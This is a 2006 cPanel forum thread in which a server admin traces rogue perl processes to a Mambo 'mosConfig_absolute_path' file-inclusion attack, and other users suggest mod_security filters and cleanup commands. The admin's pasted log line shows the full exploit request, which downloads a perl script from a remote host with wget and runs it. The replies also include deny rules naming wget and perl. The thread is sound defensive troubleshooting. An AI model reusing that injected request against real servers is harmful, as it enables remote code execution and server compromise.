The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

can not trace process - httpsl

Discussion in 'General Discussion' started by sint19, Aug 7, 2006.

  1. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    I have a lot of httpsl processes, about 50 at same time
    example one of them
    [/proc/28899]# ls -al
    total 0
    dr-xr-xr-x 3 nobody nobody 0 Aug 7 19:04 ./
    dr-xr-xr-x 1522 root root 0 Aug 6 00:31 ../
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cmdline
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cpu
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 cwd -> //
    -r-------- 1 nobody nobody 0 Aug 7 19:05 environ
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 exe -> /usr/bin/perl*
    dr-x------ 2 nobody nobody 0 Aug 7 19:05 fd/
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 maps
    -rw------- 1 nobody nobody 0 Aug 7 19:05 mem
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 mounts
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 root -> //
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 stat
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 statm
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 status



    lsof -p 28899
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    perl 28899 nobody cwd DIR 130,46 1024 456187906 /
    perl 28899 nobody rtd DIR 130,46 1024 456187906 /
    perl 28899 nobody txt REG 130,46 942729 509666453 /usr/bin/perl
    perl 28899 nobody 0r CHR 1,3 457965571 /dev/null
    perl 28899 nobody 1w FIFO 130,5 977102708 pipe
    perl 28899 nobody 2w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    perl 28899 nobody 3u IPv4 977413800 TCP my.server.com:34124->rm43.1blu.de:8209 (ESTABLISHED)
    perl 28899 nobody 4u unix 0xa22b77e0 977102504 socket
    perl 28899 nobody 5u unix 0x248a2760 976881059 socket
    perl 28899 nobody 15w REG 130,46 0 689897478 /usr/local/apache/logs/audit_log
    perl 28899 nobody 16w REG 130,46 0 689897485 /usr/local/apache/logs/modsec_debug_log
    perl 28899 nobody 17w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    ... a lot of domlogs



    for CWD (current working folder) I have only '/'
    cat environ - there is nothing
    any idea how to stop this (blocking rm43.1blu.de IP will not solve problem)

    thanks
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Looks like a perl script being run through a compromised PHP script. You're going to have to wade through your domlogs to track it down.
     
  3. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    Bingo

    Thank you, I find it, but still I don't know the best way how to stop this

    203.113.132.116 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/webdesign/images/CISLA/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/webdesign/images/CISla/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"

    exploit use mambo ''mosConfig_absolute_path''
    exploit copy mambo.txt perl script to /tmp, execute it, and delete it
     
  4. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Install mod security through WHM -> Addon Scripts, then add rules to /usr/local/apache/conf/modsec.user.conf and add a rule such as

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"
    SecFilter "com_content"
    SecFilter "perl\x20"

    Those will easily block the widely spread exploit / worm.
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Also run killall -9 perl;killall -9 httpd;httpd stop;httpd startssl

    That will clear any old processes or running exploits, and restart apache fresh after you've installed mod security and applied the necessary paths.



    In the meantime, chmod 700 /usr/bin/wget

    ASAP to avoid further exploitation.
     
  6. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    All done

    except
    SecFilter "com_content"

    it is needed for running mambo, but

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"

    do great job (HTTP Error 406 - Not acceptable)

    Thanks you
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    I would also suggest SecFilter "perl\x20"

    As that is "perl " and will be used in almost any exploit to run any file. It's better to be safe.

    Also you can use my version at http://www.hostmerit.com/modsec.user.conf

    It's highly recommended by many users of the Cpanel forums, as I code it myself and update ALOT, also it was recommended directly by Cpanel in a presentation on security at HostingCon.:p :p
     
Loading...

Share This Page